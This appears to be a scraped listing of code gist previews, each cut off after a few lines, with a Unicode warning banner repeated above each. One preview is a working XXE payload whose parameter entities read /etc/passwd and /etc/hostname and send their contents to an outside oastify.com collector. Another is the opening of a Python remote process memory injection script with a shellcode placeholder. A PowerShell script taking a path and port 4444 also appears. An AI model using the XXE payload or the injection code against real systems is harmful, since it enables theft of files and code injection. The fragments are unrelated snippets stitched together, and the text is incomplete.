This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
def send_http_request_from_file(file_path): | |
with open(file_path, 'r') as file: | |
lines = file.readlines() | |
# Parse the first line to get the HTTP method and URL | |
request_line = lines[0].strip() | |
method, url = request_line.split(' ', 1) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % fileW SYSTEM "file:///etc/hostname"> | |
<!ENTITY % fileL SYSTEM "file:///etc/passwd"> | |
<!ENTITY % fileZ SYSTEM "file:///"> | |
<!ENTITY % fileE SYSTEM "file://asdasdin/a"> | |
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileW;'>"> | |
<!ENTITY % evalq "<!ENTITY % exfiltrateq SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileL;'>"> | |
<!ENTITY % evala "<!ENTITY % exfiltratea SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
<!ENTITY % evale "<!ENTITY % exfiltratee SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
%eval; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Ensure backup of .zshrc | |
cp ~/.zshrc ~/.zshrc_copy 2>/dev/null || true | |
# Add go to path | |
echo "export PATH=$PATH:/home/$USER/go/bin" >> ~/.zshrc | |
export PATH=$PATH:/home/$USER/go/bin | |
# Abort on errors | |
set -e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Remote Process Memory Injection | |
# Doesn't work on every program | |
# Tested with .NET programs (EarTrumpet, Greenshot) | |
import sys | |
from ctypes import * | |
import psutil | |
shellCode = b"Shell_code_here" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
param ($DPath, $DPort) | |
if (!$DPath) | |
{ | |
$DPath = '.' | |
} | |
if (!$DPort) | |
{ | |
$DPort = '4444' |